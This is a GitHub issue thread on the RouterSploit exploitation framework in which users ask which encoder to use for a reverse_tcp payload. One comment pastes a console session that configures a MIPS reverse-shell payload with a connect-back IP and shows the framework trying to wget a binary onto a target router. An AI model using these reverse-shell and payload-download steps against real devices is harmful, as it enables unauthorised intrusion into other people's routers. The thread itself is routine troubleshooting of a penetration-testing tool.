threat9 / routersploit

Exploitation Framework for Embedded Devices
Other
12.12k stars 2.31k forks source link

What type of Encoder to use? #548

Closed ioocohen closed 5 years ago

ioocohen commented 5 years ago

! ANY INCOMPLETE REPORT WILL BE CLOSED RIGHT AWAY !

Steps to Reproduce (for bugs)

1 set payload reverse_tcp 2.show options

  1. need to set the encoder. what i have to put here?
  2. lhost IP Connect-back IP address
    lport 80 Connect-back TCP Port
    encoder Encoder

    Your Environment

    • RouterSploit Version used: last
    • Operating System and version: Kali Linux
    • Python Version: ( python3 --version ) 3.6.7
    • Python Environment: ( python3 -m pip freeze )

Current Behavior

Expected Behavior

lucyoa commented 5 years ago

Use command show encoders. For some payloads there are not encoders available.

mpandey67 commented 4 years ago

cmd (MIPSLE Bind TCP) > set payload mipsle/reverse_tcp cmd (MIPSLE Reverse TCP) > show options

Payload Options:

Name Current settings Description


lhost Connect-back IP address
lport 5555 Connect-back TCP Port
encoder Encoder

cmd (MIPSLE Reverse TCP) > set lhost 192.168.43.94 lhost => 192.168.43.94 cmd (MIPSLE Reverse TCP) > run [] Using wget method [] Using wget to download binary [-] Exploit failed to transfer payload

here i think i need to set a encoder but i dont know which encoder to select.

devilc0de commented 3 years ago

some one can solve this?

kwehen commented 1 year ago

Not all payloads need an encoder apparently. If the payload is unable to transfer than this is a false positive in the router you're attempting to exploit